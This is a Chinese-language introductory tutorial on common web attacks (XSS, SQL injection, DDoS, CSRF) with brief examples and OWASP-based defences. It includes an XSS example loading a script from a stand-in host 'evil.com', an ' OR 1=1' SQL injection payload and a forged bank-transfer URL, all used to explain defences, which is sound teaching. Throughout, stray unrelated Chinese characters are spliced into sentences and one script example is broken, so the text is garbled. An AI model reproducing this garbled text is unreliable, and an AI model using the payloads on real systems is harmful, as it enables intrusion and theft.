Web 安全入門(mén)之常見(jiàn)攻擊
搞 Web 開(kāi)發(fā)離不開(kāi)安全這個(gè)話(huà)題,確保網(wǎng)站或者網(wǎng)頁(yè)應(yīng)用的安全性,是每個(gè)開(kāi)發(fā)人員都應(yīng)該了解的事。本篇主要簡(jiǎn)單介紹在 Web 領(lǐng)域幾種常見(jiàn)的攻擊手段。
1. Cross Site Script(XSS衫嵌, 跨站腳本攻擊)
首先插播一句,為毛叫 XSS彻秆,縮寫(xiě)明顯是 CSS 靶ń省?沒(méi)錯(cuò)唇兑,為了防止與我們熟悉的 CSS(Cascading Style Sheets)混淆酒朵,所以干脆更名為 XSS。
那 XSS 是什么呢扎附?一言蔽之蔫耽,XSS 就是攻擊者在 Web 頁(yè)面中插入惡意腳本,當(dāng)用戶(hù)瀏覽頁(yè)面時(shí)留夜,促使腳本執(zhí)行匙铡,從而達(dá)到攻擊目的图甜。XSS 的特點(diǎn)就是想盡一切辦法在目標(biāo)網(wǎng)站上執(zhí)行第三方腳本。
( 圖片來(lái)源:XSS Tutorial?)
舉個(gè)例子鳖眼。原有的網(wǎng)站有個(gè)將數(shù)據(jù)庫(kù)中的數(shù)據(jù)顯示到頁(yè)面的上功能黑毅,document.write("data from server")。但如果服務(wù)器沒(méi)有驗(yàn)證數(shù)據(jù)類(lèi)型钦讳,直接接受任何數(shù)據(jù)時(shí)矿瘦,攻擊者可以會(huì)將 當(dāng)做一個(gè)數(shù)據(jù)寫(xiě)入數(shù)據(jù)庫(kù)。當(dāng)其他用戶(hù)請(qǐng)求這個(gè)數(shù)據(jù)時(shí)蜂厅,網(wǎng)站原有的腳本就會(huì)執(zhí)行 document.write("http://www.evil.com/bad-script.js'>")匪凡,這樣,便會(huì)執(zhí)行 bad-script.js掘猿。如果攻擊者在這段第三方的腳本中寫(xiě)入惡意腳本,那么普通用戶(hù)便會(huì)受到攻擊唇跨。
XSS 主要有三種類(lèi)型:
存儲(chǔ)型 XSS: 注入的腳本永久的存在于目標(biāo)服務(wù)器上稠通,每當(dāng)受害者向服務(wù)器請(qǐng)求此數(shù)據(jù)時(shí)就會(huì)重新喚醒攻擊腳本;
反射型 XSS: 當(dāng)用受害者被引誘點(diǎn)擊一個(gè)惡意鏈接买猖,提交一個(gè)偽造的表單改橘,惡意代碼便會(huì)和正常返回?cái)?shù)據(jù)一起作為響應(yīng)發(fā)送到受害者的瀏覽器,從而騙過(guò)了瀏覽器玉控,使之誤以為惡意腳本來(lái)自于可信的服務(wù)器飞主,以至于讓惡意腳本得以執(zhí)行。
( 圖片來(lái)源:?Cross-Site Scripting (XSS)?)
DOM 型 XSS: 有點(diǎn)類(lèi)似于存儲(chǔ)型 XSS高诺,但存儲(chǔ)型 XSS 是將惡意腳本作為數(shù)據(jù)存儲(chǔ)在服務(wù)器中碌识,每個(gè)調(diào)用數(shù)據(jù)的用戶(hù)都會(huì)受到攻擊。但 DOM 型 XSS 則是一個(gè)本地的行為虱而,更多是本地更新 DOM 時(shí)導(dǎo)致了惡意腳本執(zhí)行筏餐。
那么如何防御 XSS 攻擊呢?
從客戶(hù)端和服務(wù)器端雙重驗(yàn)證所有的輸入數(shù)據(jù)牡拇,這一般能阻擋大部分注入的腳本
對(duì)所有的數(shù)據(jù)進(jìn)行適當(dāng)?shù)木幋a
設(shè)置 HTTP Header: "X-XSS-Protection: 1"
2. SQL Injection (SQL 注入)
所謂 SQL 注入魁瞪,就是通過(guò)客戶(hù)端的輸入把 SQL 命令注入到一個(gè)應(yīng)用的數(shù)據(jù)庫(kù)中,從而得以執(zhí)行惡意 SQL 語(yǔ)句惠呼。
先看個(gè)例子导俘。
uname = request.POST['username']
password = request.POST['password']
sql = "SELECT all FROM users WHERE username='" + uname + "' AND password='" + password + "'"
database.execute(sql)
上面這段程序直接將客戶(hù)端傳過(guò)來(lái)的數(shù)據(jù)寫(xiě)入到數(shù)據(jù)庫(kù)。試想一下剔蹋,如果用戶(hù)傳入的 password 值是: "password’ OR 1=1"旅薄,那么 sql 語(yǔ)句便會(huì)變成:
sql = "SELECT all FROM users WHERE username='username' AND password='password' OR 1=1"
那么,這句 sql 無(wú)論 username 和 password 是什么都會(huì)執(zhí)行滩租,從而將所有用戶(hù)的信息取出來(lái)赋秀。
那么怎么預(yù)防 sql 的問(wèn)題呢利朵?
想要提出解決方案,先看看 sql 注入得以施行的因素:
網(wǎng)頁(yè)應(yīng)用使用 SQL 來(lái)控制數(shù)據(jù)庫(kù)
用戶(hù)傳入的數(shù)據(jù)直接被寫(xiě)入數(shù)據(jù)庫(kù)
根據(jù)?OWASP猎莲,下面看看具體的預(yù)防措施绍弟。
Prepared Statements (with Parameterized Queries): 參數(shù)化的查詢(xún)語(yǔ)句可以強(qiáng)制應(yīng)用開(kāi)發(fā)者首先定義所有的 sql 代碼,之后再將每個(gè)參數(shù)傳遞給查詢(xún)語(yǔ)句
Stored Procedures: 使用語(yǔ)言自帶的存儲(chǔ)程序著洼,而不是自己直接操縱數(shù)據(jù)庫(kù)
White List Input Validation: 驗(yàn)證用戶(hù)的輸入
Escaping All User Supplied Input: 對(duì)用戶(hù)提供的所有的輸入都進(jìn)行編碼
3. Distributed Denial of Service (DDoS樟遣, 分布式拒絕服務(wù))
DoS 攻擊就是通過(guò)大量惡意流量占用帶寬和計(jì)算資源以達(dá)到癱瘓對(duì)方網(wǎng)絡(luò)的目的。
舉個(gè)簡(jiǎn)單的例子身笤,老鄭家面館生意紅火豹悬,突然有一天一群小混混進(jìn)了點(diǎn),霸占了座位液荸,只閑聊不點(diǎn)菜瞻佛,結(jié)果坐在店里的人不吃面,想吃面的人進(jìn)不來(lái)娇钱,導(dǎo)致老鄭無(wú)法向正成吮客戶(hù)服務(wù)。
而 DDoS 攻擊就是將多個(gè)計(jì)算機(jī)聯(lián)合起來(lái)一同向目標(biāo)發(fā)起攻擊文搂,從而成倍地提高拒絕服務(wù)攻擊的威力适刀。
(圖片來(lái)源于:?DDoSCoin - An Incentive to Launch DDoS Attacks?)
一般 DDoS 攻擊有兩個(gè)目的:
敲詐勒索,逼你花錢(qián)買(mǎi)平安
打擊競(jìng)爭(zhēng)對(duì)手
在技術(shù)角度上煤蹭,DDoS攻擊可以針對(duì)網(wǎng)絡(luò)通訊協(xié)議的各層笔喉,手段大致有:TCP類(lèi)的SYN Flood、ACK Flood硝皂,UDP類(lèi)的Fraggle常挚、Trinoo,DNS Query Flood吧彪,ICMP Flood待侵,Slowloris類(lèi)、各種社工方式等等姨裸,這些技術(shù)這里不做詳細(xì)解釋秧倾。但是一般會(huì)根據(jù)攻擊目標(biāo)的情況,針對(duì)性的把技術(shù)手法混合傀缩,以達(dá)到最低的成本最難防御的目的那先,并且可以進(jìn)行合理的節(jié)奏控制,以及隱藏保護(hù)攻擊資源赡艰。
阿里巴巴的安全團(tuán)隊(duì)在實(shí)戰(zhàn)中發(fā)現(xiàn)售淡,DDoS 防御產(chǎn)品的核心是檢測(cè)技術(shù)和清洗技術(shù)。檢測(cè)技術(shù)就是檢測(cè)網(wǎng)站是否正在遭受 DDoS 攻擊,而清洗技術(shù)就是清洗掉異常流量揖闸。而檢測(cè)技術(shù)的核心在于對(duì)業(yè)務(wù)深刻的理解揍堕,才能快速精確判斷出是否真的發(fā)生了 DDoS 攻擊。清洗技術(shù)對(duì)檢測(cè)來(lái)講汤纸,不同的業(yè)務(wù)場(chǎng)景下要求的粒度不一樣衩茸。
4. Cross Site Request Forgery (CSRF, 跨站請(qǐng)求偽造)
簡(jiǎn)單來(lái)說(shuō)贮泞,CSRF 就是網(wǎng)站 A 對(duì)用戶(hù)建立信任關(guān)系后楞慈,在網(wǎng)站 B 上利用這種信任關(guān)系,跨站點(diǎn)向網(wǎng)站 A 發(fā)起一些偽造的用戶(hù)操作請(qǐng)求啃擦,以達(dá)到攻擊的目的囊蓝。
舉個(gè)例子。網(wǎng)站 A 是一家銀行的網(wǎng)站令蛉,一個(gè)轉(zhuǎn)賬接口是 "http://www.bankA.com/transfer?toID=12345678&cash=1000"聚霜。toID 表示轉(zhuǎn)賬的目標(biāo)賬戶(hù),cash 表示轉(zhuǎn)賬數(shù)目珠叔。當(dāng)然這個(gè)接口沒(méi)法隨便調(diào)用俯萎,只有在已經(jīng)驗(yàn)證的情況下才能夠被調(diào)用。
此時(shí)运杭,攻擊者建立了一個(gè) B 網(wǎng)站,里面放了一段隱藏的代碼体斩,用來(lái)調(diào)用轉(zhuǎn)賬的接口谷扣。當(dāng)受害者先成功登錄了 A 網(wǎng)站拦止,短時(shí)間內(nèi)不需要再次驗(yàn)證,這個(gè)時(shí)候又訪(fǎng)問(wèn)了網(wǎng)站 B虱咧,B 里面隱藏的惡意代碼就能夠成功執(zhí)行。
那怎么預(yù)防 CSRF 攻擊呢锚国?OWASP?推薦了兩種檢查方式來(lái)作為防御手段腕巡。
檢查標(biāo)準(zhǔn)頭部,確認(rèn)請(qǐng)求是否同源: 檢查 source origin 和 target origin血筑,然后比較兩個(gè)值是否匹配
檢查 CSRF Token: 主要有四種推薦的方式
Synchronizer Tokens: 在表單里隱藏一個(gè)隨機(jī)變化的 token绘沉,每當(dāng)用戶(hù)提交表單時(shí),將這個(gè) token 提交到后臺(tái)進(jìn)行驗(yàn)證豺总,如果驗(yàn)證通過(guò)則可以繼續(xù)執(zhí)行操作车伞。這種情況有效的主要原因是網(wǎng)站 B 拿不到網(wǎng)站 A 表單里的 token;
Double Cookie Defense: 當(dāng)向服務(wù)器發(fā)出請(qǐng)求時(shí),生成一個(gè)隨機(jī)值喻喳,將這個(gè)隨機(jī)值既放在 cookie 中另玖,也放在請(qǐng)求的參數(shù)中,服務(wù)器同時(shí)驗(yàn)證這兩個(gè)值是否匹配;
Encrypted Token Pattern: 對(duì) token 進(jìn)行加密
Custom Header: 使用自定義請(qǐng)求頭部谦去,這個(gè)方式依賴(lài)于同源策略慷丽。其中最適合的自定義頭部便是: "X-Requested-With: XMLHttpRequest"
